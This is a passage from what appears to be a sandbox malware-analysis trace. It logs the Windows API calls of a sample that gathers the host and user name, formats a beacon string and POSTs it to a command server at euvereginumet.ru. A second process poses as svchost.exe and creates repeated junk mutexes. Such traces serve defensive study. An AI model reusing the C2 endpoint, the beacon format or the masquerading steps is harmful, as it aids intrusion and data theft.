(dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0290.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0290.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0290.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0290.104] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0290.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0290.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0290.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0290.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0290.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0290.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2bc) returned 0x0 [0290.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0290.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0290.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0290.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x20c) returned 0x0 [0290.105] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0x348 [0290.105] K32GetProcessImageFileNameA (in: hProcess=0x348, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\System32\\dwm.exe") returned 0x30 [0290.105] CloseHandle (hObject=0x348) returned 1 [0290.106] lstrcpyA (in: lpString1=0x1ade98, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0290.106] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0290.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x348 [0290.106] K32GetProcessImageFileNameA (in: hProcess=0x348, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0290.106] CloseHandle (hObject=0x348) returned 1 [0290.106] lstrcpyA (in: lpString1=0x1ade98, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0290.106] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0290.106] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x348 [0290.106] OpenProcessToken (in: ProcessHandle=0x348, DesiredAccess=0x20008, TokenHandle=0x1adf8c | out: TokenHandle=0x1adf8c*=0x344) returned 1 [0290.107] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adf94 | out: TokenInformation=0x0, ReturnLength=0x1adf94) returned 0 [0290.107] GetLastError () returned 0x7a [0290.107] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x24) returned 0x3faa40 [0290.107] GetTokenInformation (in: TokenHandle=0x344, TokenInformationClass=0x1, TokenInformation=0x3faa40, TokenInformationLength=0x24, ReturnLength=0x1adf94 | out: TokenInformation=0x3faa40, ReturnLength=0x1adf94) returned 1 [0290.107] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x3faa48*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x1adfb4, cchName=0x1adfa8, ReferencedDomainName=0x1ae0b8, cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c | out: Name="kEecfMwgj", cchName=0x1adfa8, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c) returned 1 [0290.111] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3faa40 | out: hHeap=0x370000) returned 1 [0290.111] lstrcpyA (in: lpString1=0x1ae1d4, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0290.111] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0290.111] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0290.111] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0290.111] lstrcpyA (in: lpString1=0x1afcec, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0290.111] DsEnumerateDomainTrustsA () returned 0x6b5 [0290.115] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75c50000 [0290.116] GetProcAddress (hModule=0x75c50000, lpProcName="GetNativeSystemInfo") returned 0x75c710b5 [0290.116] GetNativeSystemInfo (in: lpSystemInfo=0x1ae3b8 | out: lpSystemInfo=0x1ae3b8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0290.116] wsprintfA (in: param_1=0x1ae3ec, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0290.116] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0290.116] lstrlenA (lpString="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0290.116] InternetCrackUrlA (in: lpszUrl="http://euvereginumet.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1ae364 | out: lpUrlComponents=0x1ae364) returned 1 [0290.117] InternetConnectA (hInternet=0xcc0004, lpszServerName="euvereginumet.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0290.119] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x277048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0290.120] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x1ae3ec*, dwOptionalLength=0x79) returned 1 [0290.288] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1ae3b8, lpdwBufferLength=0x1ae3a0, lpdwIndex=0x0 | out: lpBuffer=0x1ae3b8*, lpdwBufferLength=0x1ae3a0*=0x4, lpdwIndex=0x0) returned 1 [0290.288] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2470020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x1afd40 | out: lpBuffer=0x2470020*, lpdwNumberOfBytesRead=0x1afd40*=0xc) returned 1 [0290.288] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0290.288] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0290.288] Sleep (dwMilliseconds=0xea60) [0300.301] Sleep (dwMilliseconds=0xea60) [0310.351] GetVersion () returned 0x1db10106 [0310.352] GetComputerNameA (in: lpBuffer=0x1ae2d8, nSize=0x1ae3dc | out: lpBuffer="Q9IATRKPRH", nSize=0x1ae3dc) returned 1 [0310.352] lstrcatA (in: lpString1="", lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0310.352] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2=" @ " | out: lpString1="Q9IATRKPRH @ ") returned="Q9IATRKPRH @ " [0310.352] K32EnumProcesses (in: lpidProcess=0x1ace98, cb=0x1000, lpcbNeeded=0x1adfa0 | out: lpidProcess=0x1ace98, lpcbNeeded=0x1adfa0) returned 1 [0310.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x0) returned 0x0 [0310.355] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x4) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x108) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x14c) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x170) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x17c) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1a4) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1c8) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d0) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x1d8) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x248) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x28c) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x2bc) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x330) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x364) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x3f4) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x20c) returned 0x0 [0310.356] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x448) returned 0x2f8 [0310.356] K32GetProcessImageFileNameA (in: hProcess=0x2f8, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\System32\\dwm.exe") returned 0x30 [0310.356] CloseHandle (hObject=0x2f8) returned 1 [0310.357] lstrcpyA (in: lpString1=0x1ade98, lpString2="dwm.exe" | out: lpString1="dwm.exe") returned="dwm.exe" [0310.357] lstrcmpiA (lpString1="dwm.exe", lpString2="explorer.exe") returned -1 [0310.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x2f8 [0310.357] K32GetProcessImageFileNameA (in: hProcess=0x2f8, lpImageFileName=0x1acd74, nSize=0x104 | out: lpImageFileName="\\Device\\HarddiskVolume1\\Windows\\explorer.exe") returned 0x2c [0310.357] CloseHandle (hObject=0x2f8) returned 1 [0310.357] lstrcpyA (in: lpString1=0x1ade98, lpString2="explorer.exe" | out: lpString1="explorer.exe") returned="explorer.exe" [0310.357] lstrcmpiA (lpString1="explorer.exe", lpString2="explorer.exe") returned 0 [0310.357] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x458) returned 0x2f8 [0310.357] OpenProcessToken (in: ProcessHandle=0x2f8, DesiredAccess=0x20008, TokenHandle=0x1adf8c | out: TokenHandle=0x1adf8c*=0x2fc) returned 1 [0310.357] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0x1, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x1adf94 | out: TokenInformation=0x0, ReturnLength=0x1adf94) returned 0 [0310.357] GetLastError () returned 0x7a [0310.357] RtlAllocateHeap (HeapHandle=0x370000, Flags=0x0, Size=0x24) returned 0x3fa950 [0310.357] GetTokenInformation (in: TokenHandle=0x2fc, TokenInformationClass=0x1, TokenInformation=0x3fa950, TokenInformationLength=0x24, ReturnLength=0x1adf94 | out: TokenInformation=0x3fa950, ReturnLength=0x1adf94) returned 1 [0310.358] LookupAccountSidA (in: lpSystemName=0x0, Sid=0x3fa958*(Revision=0x1, SubAuthorityCount=0x5, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=([0]=0x15, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x2f)), Name=0x1adfb4, cchName=0x1adfa8, ReferencedDomainName=0x1ae0b8, cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c | out: Name="kEecfMwgj", cchName=0x1adfa8, ReferencedDomainName="Q9IATRKPRH", cchReferencedDomainName=0x1adfb0, peUse=0x1adf7c) returned 1 [0310.361] HeapFree (in: hHeap=0x370000, dwFlags=0x0, lpMem=0x3fa950 | out: hHeap=0x370000) returned 1 [0310.361] lstrcpyA (in: lpString1=0x1ae1d4, lpString2="Q9IATRKPRH" | out: lpString1="Q9IATRKPRH") returned="Q9IATRKPRH" [0310.361] lstrcatA (in: lpString1="Q9IATRKPRH", lpString2="\\" | out: lpString1="Q9IATRKPRH\\") returned="Q9IATRKPRH\\" [0310.361] lstrcatA (in: lpString1="Q9IATRKPRH\\", lpString2="kEecfMwgj" | out: lpString1="Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH\\kEecfMwgj" [0310.361] lstrcatA (in: lpString1="Q9IATRKPRH @ ", lpString2="Q9IATRKPRH\\kEecfMwgj" | out: lpString1="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj") returned="Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj" [0310.361] lstrcpyA (in: lpString1=0x1afcec, lpString2="94.114.3.195" | out: lpString1="94.114.3.195") returned="94.114.3.195" [0310.361] DsEnumerateDomainTrustsA () returned 0x6b5 [0310.365] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x75c50000 [0310.365] GetProcAddress (hModule=0x75c50000, lpProcName="GetNativeSystemInfo") returned 0x75c710b5 [0310.365] GetNativeSystemInfo (in: lpSystemInfo=0x1ae3b8 | out: lpSystemInfo=0x1ae3b8*(dwOemId=0x9, wProcessorArchitecture=0x9, wReserved=0x0, dwPageSize=0x1000, lpMinimumApplicationAddress=0x10000, lpMaximumApplicationAddress=0xfffeffff, dwActiveProcessorMask=0xf, dwNumberOfProcessors=0x4, dwProcessorType=0x21d8, dwAllocationGranularity=0x10000, wProcessorLevel=0x6, wProcessorRevision=0x5504)) [0310.365] wsprintfA (in: param_1=0x1ae3ec, param_2="GUID=%I64u&BUILD=%s&INFO=%s&EXT=%s&IP=%s&TYPE=1&WIN=%d.%d(x64)" | out: param_1="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0310.365] lstrlenA (lpString="Content-Type: application/x-www-form-urlencoded") returned 47 [0310.365] lstrlenA (lpString="GUID=9530500789527912192&BUILD=2405_pin43&INFO=Q9IATRKPRH @ Q9IATRKPRH\\kEecfMwgj&EXT=&IP=94.114.3.195&TYPE=1&WIN=6.1(x64)") returned 121 [0310.365] InternetCrackUrlA (in: lpszUrl="http://euvereginumet.ru/8/forum.php", dwUrlLength=0x0, dwFlags=0x0, lpUrlComponents=0x1ae364 | out: lpUrlComponents=0x1ae364) returned 1 [0310.365] InternetConnectA (hInternet=0xcc0004, lpszServerName="euvereginumet.ru", nServerPort=0x50, lpszUserName=0x0, lpszPassword=0x0, dwService=0x3, dwFlags=0x0, dwContext=0x0) returned 0xcc0008 [0310.367] HttpOpenRequestA (hConnect=0xcc0008, lpszVerb="POST", lpszObjectName="/8/forum.php", lpszVersion=0x0, lpszReferrer=0x0, lplpszAcceptTypes=0x277048*="*/*", dwFlags=0x84080100, dwContext=0x0) returned 0xcc000c [0310.367] HttpSendRequestA (hRequest=0xcc000c, lpszHeaders="Content-Type: application/x-www-form-urlencoded", dwHeadersLength=0x2f, lpOptional=0x1ae3ec*, dwOptionalLength=0x79) returned 1 [0310.535] HttpQueryInfoA (in: hRequest=0xcc000c, dwInfoLevel=0x20000013, lpBuffer=0x1ae3b8, lpdwBufferLength=0x1ae3a0, lpdwIndex=0x0 | out: lpBuffer=0x1ae3b8*, lpdwBufferLength=0x1ae3a0*=0x4, lpdwIndex=0x0) returned 1 [0310.535] InternetReadFile (in: hFile=0xcc000c, lpBuffer=0x2470020, dwNumberOfBytesToRead=0xfffff, lpdwNumberOfBytesRead=0x1afd40 | out: lpBuffer=0x2470020*, lpdwNumberOfBytesRead=0x1afd40*=0xc) returned 1 [0310.535] InternetCloseHandle (hInternet=0xcc000c) returned 1 [0310.535] InternetCloseHandle (hInternet=0xcc0008) returned 1 [0310.535] Sleep (dwMilliseconds=0xea60) [0320.549] Sleep (dwMilliseconds=0xea60) Thread: id = 72 os_tid = 0xfdc Thread: id = 73 os_tid = 0xfe0 Thread: id = 74 os_tid = 0xfe4 Thread: id = 75 os_tid = 0xfe8 Thread: id = 76 os_tid = 0xff0 Thread: id = 121 os_tid = 0x3a8 Process: id = "5" image_name = "svchost.exe" filename = "c:\\windows\\syswow64\\svchost.exe" page_root = "0x16a6d000" os_pid = "0xb24" os_integrity_level = "0x2000" os_privileges = "0x800000" monitor_reason = "child_process" parent_id = "4" os_parent_pid = "0xfcc" cmd_line = "C:\\Windows\\SysWOW64\\svchost.exe" cur_dir = "C:\\Users\\kEecfMwgj\\Desktop\\" os_username = "Q9IATRKPRH\\kEecfMwgj" bitness = "32" os_groups = "Q9IATRKPRH\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x10], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e77f" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 80 os_tid = 0xb28 [0164.698] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x27f898 | out: lpSystemTimeAsFileTime=0x27f898*(dwLowDateTime=0xdaca95e0, dwHighDateTime=0x1d7510f)) [0164.698] GetCurrentProcessId () returned 0xb24 [0164.698] GetCurrentThreadId () returned 0xb28 [0164.698] GetTickCount () returned 0xd2e88c [0164.698] QueryPerformanceCounter (in: lpPerformanceCount=0x27f8a0 | out: lpPerformanceCount=0x27f8a0*=1398627507550) returned 1 [0164.698] GetStartupInfoA (in: lpStartupInfo=0x27f86c | out: lpStartupInfo=0x27f86c*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\SysWOW64\\svchost.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffff, hStdOutput=0xffffffff, hStdError=0xffffffff)) [0164.703] __set_app_type (_Type=0x2) [0164.703] __p__fmode () returned 0x755d31f4 [0164.709] __getmainargs (in: _Argc=0x444018, _Argv=0x444014, _Env=0x444010, _DoWildCard=-1, _StartInfo=0x444000 | out: _Argc=0x444018, _Argv=0x444014, _Env=0x444010) returned 0 [0164.727] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x435760) returned 0x0 [0164.729] __p__acmdln () returned 0x755d04d8*="C:\\Windows\\SysWOW64\\svchost.exe" [0164.729] malloc (_Size=0x8) returned 0x6111b8 [0164.729] strlen (_Str="C:\\Windows\\SysWOW64\\svchost.exe") returned 0x1f [0164.729] malloc (_Size=0x20) returned 0x6111d8 [0164.729] _onexit (_Func=0x434f80) returned 0x434f80 [0164.734] LoadLibraryA (lpLibFileName="Kernel32.dll") returned 0x75c50000 [0164.735] GetProcAddress (hModule=0x75c50000, lpProcName="CreateMutexA") returned 0x75c64c6b [0164.735] GetProcAddress (hModule=0x75c50000, lpProcName="GetLastError") returned 0x75c611c0 [0164.735] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hrth") returned 0x5c [0164.735] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0x60 [0164.735] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0x64 [0164.735] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0x68 [0164.735] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0x6c [0164.735] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0x70 [0164.735] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0x74 [0164.735] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0x78 [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0x7c [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0x80 [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0x84 [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0x88 [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0x8c [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0x90 [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0x94 [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0x98 [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0x9c [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0xa0 [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0xa4 [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0xa8 [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0xac [0164.736] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0xb0 [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0xb4 [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0xb8 [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0xbc [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0xc0 [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0xc4 [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0xc8 [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0xcc [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0xd0 [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0xd4 [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0xd8 [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0xdc [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0xe0 [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0xe4 [0164.737] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0xe8 [0164.738] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0xec [0164.738] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0xf0 [0164.738] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0xf4 [0164.738] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0xf8 [0164.738] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0xfc [0164.738] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0x100 [0164.738] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0x104 [0164.738] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0x108 [0164.738] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0x10c [0164.738] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0x110 [0164.739] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0x114 [0164.739] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0x118 [0164.739] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0x11c [0164.739] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0x120 [0164.739] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0x124 [0164.739] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0x128 [0164.739] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0x12c [0164.739] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0x130 [0164.739] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="hotyjftyj;afdh") returned 0x134 [0164.739] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="whftyjftyjftyjtfyjtfyjtfyj;ijo;h") returned 0x138 [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="o;jtfytyjftyjftyjftyj;ijo;") returned 0x13c [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ijlhlkwaftyjftyjftjftyh;joi;i") returned 0x140 [0164.740] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=1, lpName="ah;waeh;jftyjftyjfiftfdgaf") returned 0x144 [0164.740] CreateMutexA 